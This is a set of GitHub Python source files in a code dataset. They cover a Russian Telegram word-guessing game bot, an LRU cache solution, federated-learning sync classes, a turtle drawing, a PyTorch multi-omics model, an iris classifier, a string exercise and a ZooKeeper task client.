Для победы нужно '\n 'набрать больше 24 очков', reply_markup=reply_markup, parse_mode=\"HTML\")\n\n\n\n@bot.callback_query_handler(func=lambda call: True)\ndef callback_query(call):\n \"\"\"\n Данная функция отвечает за кнопки, появляющиеся на различных этапах игры\n\n :param call: отвечает за восприятие данных, передаваемых с нажатием кнопки\n\n Функция ничего не возвращает\n \"\"\"\n \n if \"Create_Game\" in call.data:\n create_game(call)\n elif \"Round_Length\" in call.data:\n round_length(call)\n elif \"Game_Length\" in call.data:\n game_length(call)\n elif \"Start_Game\" in call.data:\n cur_session = sessions[call.data[-4:]]\n if len(cur_session.teams) >= 1:\n game(call)\n else:\n error_teams(call)\n ##############################################\n elif \"YES\" in call.data:\n cur_session = sessions[call.data[-4:]]\n if 'guessed' in call.data:\n resp = cur_session.next_team(1)\n if resp == 1:\n game(call)\n elif resp == 3:\n game_end(call)\n else:\n round(call)\n elif 'passed' in call.data:\n resp = cur_session.next_team(0)\n if resp == 1:\n game(call)\n elif resp == 3:\n game_end(call)\n else:\n round(call)\n else:\n round(call)\n ###############################################\n elif \"Time_For_Round_3\" in call.data:\n sessions[call.data[-4:]].change_time(3)\n print(sessions)\n elif \"Time_For_Round_5\" in call.data:\n sessions[call.data[-4:]].change_time(5)\n print(sessions)\n elif \"Time_For_Round_10\" in call.data:\n sessions[call.data[-4:]].change_time(10)\n print(sessions)\n elif \"Time_For_Round_15\" in call.data:\n sessions[call.data[-4:]].change_time(15)\n print(sessions)\n elif \"Time_For_Round_50\" in call.data:\n sessions[call.data[-4:]].change_time(50)\n print(sessions)\n ###############################################\n elif \"Time_For_Game_10\" in call.data:\n sessions[call.data[-4:]].change_max_score(10)\n print(sessions)\n elif \"Time_For_Game_20\" in call.data:\n sessions[call.data[-4:]].change_max_score(20)\n print(sessions)\n elif \"Time_For_Game_30\" in call.data:\n sessions[call.data[-4:]].change_max_score(30)\n print(sessions)\n elif \"Time_For_Game_50\" in call.data:\n sessions[call.data[-4:]].change_max_score(50)\n print(sessions)\n elif \"Time_For_Game_100\" in call.data:\n sessions[call.data[-4:]].change_max_score(100)\n print(sessions)\n ################################################\n elif \"Teams\" in call.data :\n change_teams(call)\n elif 'Супер Коровы' in call.data:\n sessions[call.data[-4:]].add_team((call.data)[:-5])\n print(sessions)\n elif 'Псы Волколаки' in call.data:\n sessions[call.data[-4:]].add_team((call.data)[:-5])\n print(sessions)\n elif 'Ночные Бабушки' in call.data:\n sessions[call.data[-4:]].add_team((call.data)[:-5])\n print(call.data)\n print(sessions)\n elif 'Биполярные Медведи' in call.data:\n sessions[call.data[-4:]].add_team((call.data)[:-5])\n print(sessions)\n elif 'Лягушки в обмороке' in call.data:\n sessions[call.data[-4:]].add_team((call.data)[:-5])\n print(sessions)\n ###########################################################\n elif 'End_Game' in call.data:\n thanks(call)\n elif 'Next_Game' in call.data:\n cur_session = sessions[call.data[-4:]]\n cur_session.clear()\n create_game(call)\n elif 'Authors' in call.data:\n authors(call)\n elif 'after_authors' in call.data:\n game_end(call)\n\n\ndef create_game(call):\n \"\"\"\n Функция отвечает за этап игры, на котором человек вводит длительность игры, длительность раунда, добавляет команды, а также начинает игру\n\n :param call: отвечает за восприятие данных, передаваемых с 
нажатием кнопки\n\n Функция ничего не возвращает\n \"\"\"\n new_key = call.data[-4:]\n cur_session = sessions[new_key]\n cur_teams = cur_session.teams\n keyboard = [\n [telebot.types.InlineKeyboardButton(\"Начать игру\", callback_data='Start_Game'+'$'+new_key)],\n [telebot.types.InlineKeyboardButton(\"Длительность раунда\", callback_data='Round_Length'+'$'+new_key)],\n [telebot.types.InlineKeyboardButton(\"Длительность игры\", callback_data='Game_Length'+'$'+new_key)],\n [telebot.types.InlineKeyboardButton(\"Добавить команды\", callback_data='Teams'+'$'+new_key)]\n ]\n\n reply_markup = telebot.types.InlineKeyboardMarkup(keyboard)\n\n createGameMessage = 'Выберите подходящие параметры для своей игры, затем нажмите \"Начать игру\", чтобы к ней присоединиться'\n createGameMessage += cur_session.get_info()\n bot.edit_message_text(chat_id=call.message.chat.id, message_id=call.message.message_id, text=createGameMessage,\n reply_markup=reply_markup)\n\ndef game(call):\n \"\"\"\n Функция изменяет сообщение на 'Вы готовы?', показывает отвечающую команду и и её очки\n\n :param call: отвечает за восприятие данных, передаваемых с нажатием кнопки\n\n Функция ничего не возвращает\n \"\"\"\n cur_session = sessions[call.data[-4:]]\n cur_team = cur_session.cur_team()\n keyboard = [\n [telebot.types.InlineKeyboardButton(\"Да!\", callback_data='YES' + '$' + call.data[-4:])]\n ]\n \n ready = f'Команда {str(cur_team)}, вы готовы?\\nОчки команд:\\n'\n for i in cur_session.teams:\n ready += (' ' + str(i.name) + ' ' + str(i.points) + '\\n')\n \n reply_markup = telebot.types.InlineKeyboardMarkup(keyboard)\n bot.edit_message_text(chat_id=call.message.chat.id, message_id=call.message.message_id, text=ready,\n reply_markup=reply_markup)\n\n\ndef round(call):\n \"\"\"\n Функция отвечает за раунд в игре, изменяет сообщение, показывая новое слово, под которым имеются кнопки \"Отгадано\" и \"Пропущено\"\n\n :param call: отвечает за восприятие данных, передаваемых с нажатием кнопки\n\n Функция ничего не возвращает\n \"\"\"\n cur_session = sessions[call.data[-4:]]\n word = cur_session.give_word()\n keyboard = [\n [telebot.types.InlineKeyboardButton(\"Отгадано\", callback_data='YES_guessed' + '$' + call.data[-4:])],\n [telebot.types.InlineKeyboardButton(\"Пропущено\", callback_data='YES_passed' + '$' + call.data[-4:])]\n ]\n reply_markup = telebot.types.InlineKeyboardMarkup(keyboard)\n bot.edit_message_text(chat_id=call.message.chat.id, message_id=call.message.message_id, text= \"ваше слово: \"+word,\n reply_markup=reply_markup)\n\n\ndef round_length(call):\n \"\"\"\n Функция изменяет сообщение, показывая кнопки, через которые можно изменить количество слов, которое будет объяснять команда в раунде\n\n :param call: отвечает за восприятие данных, передаваемых с нажатием кнопки\n\n Функция ничего не возвращает\n \"\"\"\n keyboard = [\n [telebot.types.InlineKeyboardButton(\"3\", callback_data='Time_For_Round_3'+'$'+call.data[-4:]),\n telebot.types.InlineKeyboardButton(\"5\", callback_data='Time_For_Round_5'+'$'+call.data[-4:]),\n telebot.types.InlineKeyboardButton(\"10\", callback_data='Time_For_Round_10'+'$'+call.data[-4:])],\n [telebot.types.InlineKeyboardButton(\"15\", callback_data='Time_For_Round_15'+'$'+call.data[-4:]),\n telebot.types.InlineKeyboardButton(\"ОК\", callback_data='Create_Game'+'$'+call.data[-4:]),\n telebot.types.InlineKeyboardButton(\"50\", callback_data='Time_For_Round_50'+'$'+call.data[-4:])]\n ]\n reply_markup = telebot.types.InlineKeyboardMarkup(keyboard)\n round_length_text = 'Выберите длительность 
раунда (количество слов, объясняемое за раунд)'\n bot.edit_message_text(chat_id=call.message.chat.id, message_id=call.message.message_id,\n text=round_length_text, parse_mode=\"HTML\", reply_markup=reply_markup)\n\ndef game_length(call):\n \"\"\"\n Функция изменяет сообщение, показывая кнопки, через которые можно изменить количество слов, требуемое для победы в игре\n\n :param call: отвечает за восприятие данных, передаваемых с нажатием кнопки\n\n Функция ничего не возвращает\n \"\"\"\n keyboard = [\n [telebot.types.InlineKeyboardButton(\"10\", callback_data='Time_For_Game_10'+'$'+call.data[-4:]),\n telebot.types.InlineKeyboardButton(\"20\", callback_data='Time_For_Game_20'+'$'+call.data[-4:]),\n telebot.types.InlineKeyboardButton(\"30\", callback_data='Time_For_Game_30'+'$'+call.data[-4:])],\n [telebot.types.InlineKeyboardButton(\"50\", callback_data='Time_For_Game_50'+'$'+call.data[-4:]),\n telebot.types.InlineKeyboardButton(\"ОК\", callback_data='Create_Game'+'$'+call.data[-4:]),\n telebot.types.InlineKeyboardButton(\"100\", callback_data='Time_For_Game_100'+'$'+call.data[-4:])]\n ]\n reply_markup = telebot.types.InlineKeyboardMarkup(keyboard)\n round_length_text = 'Выберите длительность игры (в количестве слов)'\n bot.edit_message_text(chat_id=call.message.chat.id, message_id=call.message.message_id,\n text=round_length_text, parse_mode=\"HTML\", reply_markup=reply_markup)\n\ndef change_teams(call):\n \"\"\"\n Функция изменяет сообщение, показывая кнопки, через которые можно изменить команды, участвующие в игре\n\n :param call: отвечает за восприятие данных, передаваемых с нажатием кнопки\n\n Функция ничего не возвращает\n \"\"\"\n cur_session = sessions[call.data[-4:]]\n keyboard = [\n [telebot.types.InlineKeyboardButton(\"ОК\", callback_data='Create_Game'+'$'+call.data[-4:])],\n [telebot.types.InlineKeyboardButton(\"Супер Коровы 🐮\" + '✅' if \"🐮\" in cur_session.get_info() else \"Супер Коровы 🐮\" + '', callback_data='Супер Коровы'+'$'+call.data[-4:])],\n [telebot.types.InlineKeyboardButton(\"Псы Волколаки 🐺\" + '✅' if \"🐺\" in cur_session.get_info() else \"Псы Волколаки 🐺\" + '', callback_data='Псы Волколаки'+'$'+call.data[-4:])],\n [telebot.types.InlineKeyboardButton(\"Ночные Бабушки 👵\" + '✅' if \"👵\" in cur_session.get_info() else \"Ночные Бабушки 👵\" + '', callback_data='Ночные Бабушки'+'$'+call.data[-4:])],\n [telebot.types.InlineKeyboardButton(\"Биполярные Медведи 🐼\" + '✅' if \"🐼\" in cur_session.get_info() else \"Биполярные медведи 🐼\" + '', callback_data='Биполярные Медведи' + '$' + call.data[-4:])],\n [telebot.types.InlineKeyboardButton(\"Лягушки в обмороке 🐸\" + '✅' if \"🐸\" in cur_session.get_info() else \"Лягушки в обмороке 🐸\" + '', callback_data='Лягушки в обмороке' + '$' + call.data[-4:])],\n ]\n reply_markup = telebot.types.InlineKeyboardMarkup(keyboard)\n teams_text = 'нажмите на названия команд, которые хотите добавить'\n bot.edit_message_text(chat_id=call.message.chat.id, message_id=call.message.message_id,\n text=teams_text, parse_mode=\"HTML\", reply_markup=reply_markup)\n\n\ndef game_end(call):\n \"\"\"\n Функция изменяет сообщение в конце игры, показывая кнопки, с помощью которых можно начать новую игру, завершить игру и посмотреть на авторов\n\n :param call: отвечает за восприятие данных, передаваемых с нажатием кнопки\n\n Функция ничего не возвращает\n \"\"\"\n cur_session = sessions[call.data[-4:]]\n keyboard = [\n [telebot.types.InlineKeyboardButton(\"Новая игра\", callback_data='Next_Game'+'$'+call.data[-4:])],\n 
[telebot.types.InlineKeyboardButton(\"Завершить игру\", callback_data='End_Game'+'$'+call.data[-4:])],\n [telebot.types.InlineKeyboardButton(\"Авторы\", callback_data='Authors'+'$'+call.data[-4:])]\n ]\n text_endgame = 'Игра завершена, победила команда '+ cur_session.cur_team() + '\\n'\n text_endgame += 'Очки команд:\\n'\n for i in cur_session.teams:\n text_endgame += (' ' + str(i.name) + ' ' + str(i.points) + '\\n')\n \n reply_markup = telebot.types.InlineKeyboardMarkup(keyboard)\n bot.edit_message_text(chat_id=call.message.chat.id, message_id=call.message.message_id,\n text=text_endgame, parse_mode=\"HTML\", reply_markup=reply_markup)\n\n\ndef authors(call):\n \"\"\"\n Функция изменяет сообщение в конце игры, показывая информацию об авторах\n\n :param call: отвечает за восприятие данных, передаваемых с нажатием кнопки\n\n Функция ничего не возвращает\n \"\"\"\n keyboard = [\n [telebot.types.InlineKeyboardButton(\"Панаятна\", callback_data='after_authors' +'$' +call.data[-4:])],\n ]\n reply_markup = telebot.types.InlineKeyboardMarkup(keyboard)\n createGameMessage = 'Авторы рукожопы и ленятий ничего делать не умеют, на звания пРоГрАмМиСтОв не претендуют'\n bot.edit_message_text(chat_id=call.message.chat.id, message_id=call.message.message_id, text=createGameMessage,\n reply_markup=reply_markup)\n\ndef error_teams(call):\n \"\"\"\n Функция изменяет сообщение, показывая, что нельзя начать игру, если не была добавлена ни одна команда\n\n :param call: отвечает за восприятие данных, передаваемых с нажатием кнопки\n\n Функция ничего не возвращает\n \"\"\"\n keyboard = [\n [telebot.types.InlineKeyboardButton(\"Ладно(\", callback_data='Create_Game' +'$' +call.data[-4:])],\n ]\n reply_markup = telebot.types.InlineKeyboardMarkup(keyboard)\n createGameMessage = 'Вам необходимо добавить хотя бы одну команду👉👈'\n bot.edit_message_text(chat_id=call.message.chat.id, message_id=call.message.message_id, text=createGameMessage,\n reply_markup=reply_markup)\n \ndef thanks(call):\n \"\"\"\n Функция отправляет сообщение с благодарностью за игру\n\n :param call: отвечает за восприятие данных, передаваемых с нажатием кнопки\n\n Функция ничего не возвращает\n \"\"\"\n cur_session = sessions[call.data[-4:]]\n cur_session.clear()\n text = \"Спасибо за игру!\"\n keyboard = [[]]\n reply_markup = telebot.types.InlineKeyboardMarkup(keyboard)\n bot.edit_message_text(chat_id=call.message.chat.id, message_id=call.message.message_id,\n text=text, parse_mode=\"HTML\", reply_markup=reply_markup)\n\n\nbot.infinity_polling()\n","repo_name":"m-fedosov/alias_bot","sub_path":"new.py","file_name":"new.py","file_ext":"py","file_size_in_byte":18747,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6207219317","text":"# LeetCode 146\n# LRU Cache\n# Linked List\n\nfrom typing import List\nimport collections\nimport sys\n\nclass Node:\n def __init__(self, k, v):\n self.key = k\n self.val = v\n self.next = None\n self.last = None\n\nclass LRUCache:\n\n def __init__(self, capacity: int):\n self.head = Node(0, 0)\n self.tail = Node(0, 0)\n self.head.next = self.tail\n self.tail.next = self.head\n self.cap = capacity\n self.usage = 0\n self.map = dict()\n\n def get(self, key: int) -> int:\n if key not in self.map:\n return -1\n node = self.map[key]\n if self.head.next != node:\n self.delink(node)\n self.insert(node)\n return node.val\n\n def put(self, key: int, value: int) -> None:\n if key in self.map:\n node = self.map[key]\n node.val = value\n self.delink(node)\n 
self.insert(node)\n return\n \n if self.usage == self.cap:\n del self.map[self.tail.last.key]\n self.delink(self.tail.last)\n self.usage = self.usage - 1\n \n node = Node(key, value)\n self.insert(node)\n self.map[key] = node\n self.usage = self.usage + 1\n\n def delink(self, node):\n node.last.next = node.next\n node.next.last = node.last\n\n def insert(self, node):\n next_node = self.head.next\n self.head.next = node\n node.last = self.head\n node.next = next_node\n next_node.last = node\n \n\nif __name__ == \"__main__\":\n # Your LRUCache object will be instantiated and called as such:\n obj = LRUCache(2)\n obj.put(1, 1)\n obj.put(2, 2)\n print(obj.get(1))\n obj.put(3, 3)\n print(obj.get(2))\n obj.put(4, 4)\n print(obj.get(1))\n print(obj.get(3))\n print(obj.get(4))","repo_name":"David-Xiang/Online-Judge-Solutions","sub_path":"210729/LC146.py","file_name":"LC146.py","file_ext":"py","file_size_in_byte":1851,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"26900681845","text":"import numpy as np\n\nfrom federatedml.util import consts\n\n\nclass SqnSyncBase(object):\n def __init__(self):\n self.batch_data_index_transfer = None\n self.host_forwards_transfer = None\n self.forward_hess = None\n self.forward_hess_transfer = None\n\n\nclass Guest(SqnSyncBase):\n def __init__(self):\n super().__init__()\n self.guest_hess_vector = None\n\n def register_transfer_variable(self, transfer_variable):\n self.batch_data_index_transfer = transfer_variable.sqn_sample_index\n self.guest_hess_vector = transfer_variable.guest_hess_vector\n self.host_forwards_transfer = transfer_variable.host_sqn_forwards\n self.forward_hess_transfer = transfer_variable.forward_hess\n\n def sync_sample_data(self, data_instances, sample_size, random_seed, suffix=tuple()):\n n = data_instances.count()\n if sample_size >= n:\n sample_rate = 1.0\n else:\n sample_rate = sample_size / n\n sampled_data = data_instances.sample(fraction=sample_rate, seed=random_seed)\n\n batch_index = sampled_data.mapValues(lambda x: None)\n self.batch_data_index_transfer.remote(obj=batch_index,\n role=consts.HOST,\n suffix=suffix)\n return sampled_data\n\n def get_host_forwards(self, suffix=tuple()):\n host_forwards = self.host_forwards_transfer.get(idx=-1,\n suffix=suffix)\n return host_forwards\n\n def remote_forward_hess(self, forward_hess, suffix=tuple()):\n self.forward_hess_transfer.remote(obj=forward_hess,\n role=consts.HOST,\n suffix=suffix)\n\n def sync_hess_vector(self, hess_vector, suffix):\n self.guest_hess_vector.remote(obj=hess_vector,\n role=consts.ARBITER,\n suffix=suffix)\n\n\nclass Host(SqnSyncBase):\n def __init__(self):\n super().__init__()\n self.host_hess_vector = None\n\n def register_transfer_variable(self, transfer_variable):\n self.batch_data_index_transfer = transfer_variable.sqn_sample_index\n self.host_forwards_transfer = transfer_variable.host_sqn_forwards\n self.host_hess_vector = transfer_variable.host_hess_vector\n self.forward_hess_transfer = transfer_variable.forward_hess\n\n def sync_sample_data(self, data_instances, suffix=tuple()):\n batch_index = self.batch_data_index_transfer.get(idx=0,\n suffix=suffix)\n sample_data = data_instances.join(batch_index, lambda x, y: x)\n return sample_data\n\n def remote_host_forwards(self, host_forwards, suffix=tuple()):\n self.host_forwards_transfer.remote(obj=host_forwards,\n role=consts.GUEST,\n suffix=suffix)\n\n def get_forward_hess(self, suffix=tuple()):\n forward_hess = self.forward_hess_transfer.get(idx=0,\n 
suffix=suffix)\n return forward_hess\n\n def sync_hess_vector(self, hess_vector, suffix):\n self.host_hess_vector.remote(obj=hess_vector,\n role=consts.ARBITER,\n suffix=suffix)\n\n\nclass Arbiter(object):\n def __init__(self):\n super().__init__()\n self.guest_hess_vector = None\n self.host_hess_vector = None\n\n def register_transfer_variable(self, transfer_variable):\n self.guest_hess_vector = transfer_variable.guest_hess_vector\n self.host_hess_vector = transfer_variable.host_hess_vector\n\n def sync_hess_vector(self, suffix):\n guest_hess_vector = self.guest_hess_vector.get(idx=0,\n suffix=suffix)\n host_hess_vectors = self.host_hess_vector.get(idx=-1,\n suffix=suffix)\n host_hess_vectors = [x.reshape(-1) for x in host_hess_vectors]\n hess_vectors = np.hstack((h for h in host_hess_vectors))\n hess_vectors = np.hstack((hess_vectors, guest_hess_vector))\n return hess_vectors\n","repo_name":"FederatedAI/FATE","sub_path":"python/federatedml/optim/gradient/sqn_sync.py","file_name":"sqn_sync.py","file_ext":"py","file_size_in_byte":4342,"program_lang":"python","lang":"en","doc_type":"code","stars":5296,"dataset":"github-code","pt":"53"} +{"seq_id":"21316564647","text":"# 使用turtle乌龟绘制奥运五环\r\nimport turtle\r\ndef draw_circle(x,y,color,r=45):\r\n turtle.pencolor(color)\r\n turtle.up()\r\n turtle.goto(x,y)\r\n turtle.down()\r\n turtle.circle(r)\r\n\r\nif __name__ == '__main__':\r\n colors = ['blue','black','red','yellow','green']\r\n xy_list = [(-110, -25), (0, -25), (110, -25), (-55, -75), (55, -75)]\r\n scwide = 400\r\n scheight = 400\r\n turtle.pensize(5)\r\n turtle.speed(6)\r\n turtle.screensize(scwide, scheight)\r\n for n in range(5):\r\n draw_circle(xy_list[n][0],xy_list[n][1],colors[n])\r\n turtle.hideturtle()\r\n turtle.done()\r\n","repo_name":"Ww0225/pythonTest","sub_path":"奥运五环.py","file_name":"奥运五环.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70010215847","text":"import torch \nimport torch.nn as nn\nfrom collections import OrderedDict\nfrom torch.optim import Adam\nimport numpy as np\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\n\nclass FullyConnectedLayer(nn.Module):\n def __init__(self, input_dim, output_dim, dropout = 0, task = 'None'):\n \"\"\"\n Parameters:\n input_dim (int) -- Input dimension\n output_dim (int) -- Output dimension\n dropout (float) -- Dropout rate (default : 0)\n task (str) -- Classification or regression (default : regerssion)\n \"\"\"\n super(FullyConnectedLayer, self).__init__()\n \n # Linear\n self.fc_block = [nn.Linear(input_dim, output_dim)]\n\n # Dropout\n if 0 < dropout <= 1:\n self.fc_block.append(nn.Dropout(p = dropout))\n \n # Activation function\n if task == 'cls':\n self.fc_block.append(nn.Sigmoid())\n else:\n self.fc_block.append(nn.ReLU())\n \n \n self.fc_block = nn.Sequential(*self.fc_block)\n\n def forward(self, x):\n y = self.fc_block(x)\n return y\n\n \n# Feature extractor\nclass Encoder(nn.Module):\n def __init__(self, input_dim, h_dim = [1024, 512], z_dim = 256, dropout = 0):\n \"\"\"\n Parameters:\n input_dim (int) -- Input dimension\n h_dim (list) -- hidden dimension (default : [1024, 512])\n z_dim (int) -- Output dimension (default : 256)\n dropout (float) -- Dropout rate (default : 0)\n \"\"\"\n super(Encoder, self).__init__()\n \n if len(h_dim) == 0:\n self.encoder = FullyConnectedLayer(input_dim, z_dim, dropout) # Only output layer\n else: \n self.en_layers = OrderedDict()\n 
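# ordered stack: 'InputLayer', one 'Layer{i}' per remaining hidden dim, then 'OutputLayer' projecting h_dim[-1] to z_dim\n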
self.en_layers['InputLayer'] = FullyConnectedLayer(input_dim, h_dim[0], dropout)\n for num in range(1, len(h_dim)):\n self.en_layers['Layer{}'.format(num)] = FullyConnectedLayer(h_dim[num - 1], h_dim[num], dropout)\n self.en_layers['OutputLayer'] = FullyConnectedLayer(h_dim[-1], z_dim, dropout)\n self.encoder = nn.Sequential(self.en_layers)\n \n def forward(self, x):\n encode = self.encoder(x)\n return encode\n\ndef cross_entropy(preds, targets, reduction = 'none'):\n \"\"\"\n Parameters:\n preds (int) -- Prediction result\n targets (list) -- Ground truth\n reduction (int) -- Loss recording method (default : none)\n \"\"\"\n log_softmax = nn.LogSoftmax(dim = -1)\n loss = (-targets * log_softmax(preds)).sum(1)\n if reduction == \"none\":\n return loss\n elif reduction == \"mean\":\n return loss.mean() \n\ndef cal_LA_loss(embedding1, embedding2, temperature):\n \"\"\"\n Parameters:\n embedding1 (list) -- An omics feature\n embedding2 (list) -- Another omcis feature \n temperature (float) -- To adjust the range of similarity between two matrices\n \"\"\"\n logits = (embedding1 @ embedding2.T) / temperature # Calculate the similarity of two matrices and use temperature to adjust the range \n similarity1 = embedding1 @ embedding1.T # An omics similarity matrix\n similarity2 = embedding2 @ embedding2.T # Another omics similarity matrix\n targets = F.softmax((similarity1 + similarity2) / 2 * temperature, dim = -1) # Obtain the target matrix by computing two matrices\n loss1 = cross_entropy(logits, targets, reduction = 'none')\n loss2 = cross_entropy(logits.T, targets.T, reduction = 'none')\n return ((loss1 + loss2) / 2.0).mean()\n\ndef C(k):\n \"\"\"\n Parameters:\n k (int) -- Input to calculate the number of combinations\n \"\"\"\n return int(k * (k - 1) / 2)\n\n# Latent Alginment Multi-Omics Integration\nclass LAMOI(nn.Module):\n def __init__(self, input_dim, h_dim, z_dim, temperature, dropout, device, attention = True, Weight = 1.0, k = 40, channel = 2):\n \"\"\"\n Parameters:\n input_dim (int) -- Number of features per omics data\n h_dim (list) -- Hidden dimension\n z_dim (list) -- Output dimension of feature extractor\n temperature (float) -- To adjust the range of similarity between two matrices\n dropout (float) -- Dropout rate \n device (float) -- CPU or GPU\n attention (bool) -- Using attention module or not\n Weight (float) -- Weight of latent alignment loss\n k (float) -- Hidden dimension of omcis weights\n channel (int) -- Hidden dimension of affinity weights\n \"\"\"\n super(LAMOI, self).__init__()\n \n self.encoder = nn.ModuleList([Encoder(input_dim[i], h_dim[i], z_dim, dropout) for i in range(len(input_dim))]) # Initial feature extractors of these omics data\n \n self.aff_weight = nn.ParameterList([nn.Parameter(torch.randn(int(z_dim / channel), int(z_dim / channel))) for i in range(C(len(input_dim)))]) # The affinity matrix under the pairwise information in these omics data \n self.W = nn.ParameterList([nn.Parameter(torch.randn(k, int(z_dim / channel))) for i in range(len(input_dim))]) # The weight of these omics data\n self.W_h = nn.ParameterList([nn.ParameterList([nn.Parameter(torch.randn(k, 1)) for i in range(len(input_dim))]) for i in range(len(input_dim))]) # The weight under the pairwise these omics data \n \n self.Weight = Weight # lambda : weight of latent alignment loss\n self.device = device\n self.temperature = temperature # Adjust hyperparameter for similarity range\n self.softmax = nn.Softmax(2)\n self.tanh = nn.Tanh()\n self.z_dim = z_dim\n self.channel = channel # 
Adjust hyperparameter for affinity weight\n self.att = attention # Using attention or not\n \n def forward(self, x):\n # feature extraction\n encode = [self.encoder[i](x[i]) for i in range(len(x))]\n \n concat_data = encode[0]\n for i in range(1, len(x)):\n concat_data = torch.cat((concat_data, encode[i]), 1)\n \n if self.att:\n if len(x) > 1: # The number of omics data is greater than one\n temp_encode = encode.copy()\n # Divide the features on the latent space into N blocks\n for i in range(len(temp_encode)):\n temp_encode[i] = torch.unsqueeze(temp_encode[i], 2).reshape(-1, int(self.z_dim / self.channel), self.channel)\n # Initialize\n affinity_matrix, H, A, Att_encode = [], [], [], []\n for i in range(len(temp_encode)):\n index = 0\n affinity_matrix.append([])\n H.append([])\n A.append([])\n Att_encode.append([])\n for j in range(len(temp_encode)):\n if i <= j:\n affinity_matrix[i].append(torch.swapaxes(temp_encode[i], 1, 2) @ self.aff_weight[index] @ temp_encode[j]) # Use the aff_weight to learn the information between two omcis\n H[i].append(self.tanh(self.W[j] @ temp_encode[j] + self.W[i] @ temp_encode[i] @ affinity_matrix[i][j])) # Use W to weight all omics and add up\n if i < j: index += 1\n else:\n affinity_matrix[i].append(torch.swapaxes(affinity_matrix[j][i], 1, 2))\n H[i].append(self.tanh(self.W[i] @ temp_encode[i] + self.W[j] @ temp_encode[j] @ affinity_matrix[i][j]))\n A[i].append(self.softmax(self.W_h[i][j].T @ H[i][j])) # Use softmax to get the omics weights containing all omics data information\n if i != j:\n Att_encode[i].append(A[i][j] * temp_encode[i]) # Multiply the attention weight back to each physical data\n\n concat_data = Att_encode[0][0].reshape(-1, self.z_dim)\n for i in range(len(Att_encode)):\n for j in range(len(Att_encode[i])):\n if i != 0 or j != 0:\n concat_data = torch.cat((concat_data, Att_encode[i][j].reshape(-1, self.z_dim)), 1)\n \n return encode, concat_data\n \n def loss(self, x):\n reconstruct_loss = nn.MSELoss()\n encode, concat_data = self.forward(x)\n loss_LA = 0\n \n if self.Weight > 0:\n for i in range(len(encode)):\n for j in range(i + 1, len(encode)):\n loss_LA = loss_LA + cal_LA_loss(encode[i], encode[j], self.temperature) # Calculate the latent alignment loss between all omics\n \n loss_LA = self.Weight * loss_LA\n \n return loss_LA\n\n# Predictor\nclass Regression(nn.Module):\n def __init__(self, n_class, latent_dim, class_dim):\n \"\"\"\n Construct a multi-layer fully-connected classifier\n Parameters:\n n_class (int) -- Ouput dimension (number of drugs)\n latent_dim (int) -- The dimensionality of the latent space and the input layer of the classifier\n class_dim (int) -- Hidden dimension\n \"\"\"\n super(Regression, self).__init__()\n \n self.reg = nn.Sequential(\n nn.Linear(latent_dim, class_dim[0]),\n nn.ReLU(),\n nn.Linear(class_dim[0], class_dim[1]),\n nn.ReLU(),\n nn.Linear(class_dim[1], n_class),\n )\n \n def forward(self, x):\n return self.reg(x)\n","repo_name":"Chei-YuanChi/Matster_Thesis","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":9723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20387048703","text":"'''\nCrie um programa que leia o nome de uma pessoa e diga se ela tem \"SILVA\" no nome.\n\n'''\n\nnome = input('Digite seu nome: ').upper()\n\nmensagem = [\n f\"Seu nome '{nome}' não tem 'SILVA'.\", \n f\"Seu nome '{nome}' tem 'SILVA'.\"\n]\n\nprint(mensagem['SILVA' in 
nome])","repo_name":"juliannalencar/exercicios-fixacao","sub_path":"curso_em_video_py/ex025.py","file_name":"ex025.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41689973671","text":"#This program predicts what type of flower based on an input and graphs the points.\n\nimport numpy as np\nfrom sklearn.datasets import load_iris\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.neighbors import KNeighborsClassifier\nimport matplotlib.pyplot as plt\n\niris = load_iris()\n#print(iris.keys())\n#print(iris['data'])\n#print(iris['DESCR'])\n#print(iris['target_names'])\n\nX_train, X_test, y_train, y_test = train_test_split(iris['data'], iris['target'], random_state=0)\n\nknn = KNeighborsClassifier(n_neighbors=1)\nknn.fit(X_train, y_train)\n\nX_new = np.array([[1,2,1,2]])\n\nprediction = knn.predict(X_new)\n\nprint(iris['target_names'][prediction])\n\nprint(knn.score(X_test, y_test))\n\nplt.scatter(iris.data[:, 0], iris.data[:, 1], c=iris.target)\nplt.xlabel('sepal_length')\nplt.ylabel('sepal_width')\nformatter = plt.FuncFormatter(lambda i, *args: iris.target_names[int(i)])\nplt.colorbar(ticks=[0, 1, 2], format=formatter)\nplt.show()\n","repo_name":"DanielBDosSantos/Iris-data-prediction-and-graphing","sub_path":"irisGraph/iris_class_prediction.py","file_name":"iris_class_prediction.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35646183928","text":"#!/usr/bin/env python2.7\nimport time, socket, os, uuid, sys, kazoo, logging, signal, utils, random\nfrom election import Election\nfrom utils import MASTER_PATH\nfrom utils import TASKS_PATH\nfrom utils import DATA_PATH\nfrom utils import WORKERS_PATH\n\nclass Client:\n def __init__(self, zk):\n self.limit = 5\n self.zk = zk\n self.counter = 0\n\n def submit_task(self):\n task_id = uuid.uuid4()\n task_data = str(random.randint(5, 20))\n print (\"creating task\", task_id)\n self.zk.create(TASKS_PATH + \"/\" + task_id)\n self.zk.create(DATA_PATH + \"/\" + task_id, value=task_data)\n self.counter += 1\n self.zk.get(TASKS_PATH + \"/\" + task_id, watch=self.task_completed)\n\n def task_completed(self, event):\n result = self.zk.get(event.path)[0]\n self.zk.delete(event.path)\n self.zk.delete(event.path.replace(TASKS_PATH, DATA_PATH))\n self.counter -= 1\n print (\"task\", event.path.replace(TASKS_PATH + \"/\", \"\"), \"completed\")\n return result\n\n def submit_task_loop(self):\n while True:\n if self.counter <= self.limit:\n self.submit_task()\n\n\nif __name__ == '__main__':\n zoo_keeper = utils.init()\n client = Client(zoo_keeper)\n client.submit_task_loop()\n while True:\n 